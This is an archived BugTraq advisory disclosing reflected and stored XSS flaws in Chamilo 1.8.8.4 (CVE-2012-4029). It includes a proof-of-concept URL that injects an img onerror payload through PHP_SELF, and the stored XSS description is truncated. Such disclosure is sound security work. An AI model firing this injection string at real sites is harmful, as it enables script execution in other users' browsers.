BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
Chamilo 1.8.8.4 Multiple Vulnerabilities Aug 25 2012 01:19AM
beford (xbefordx gmail com)
Chamilo 1.8.8.4 Multiple Vulnerabilities
========================

CVE: CVE-2012-4029
Issue: Reflected XSS PHP_SELF in third-party app, Stored XSS

* PHP_SELF XSS
http://chamilo-1.8.8.4/main/inc/lib/phpdocx/pdf/www/examples.php/'"><img

src=404 onerror=alert(1) >

* Stored XSS unfiltered input categ...

[ more ]  
 

Privacy Statement
Copyright 2010, SecurityFocus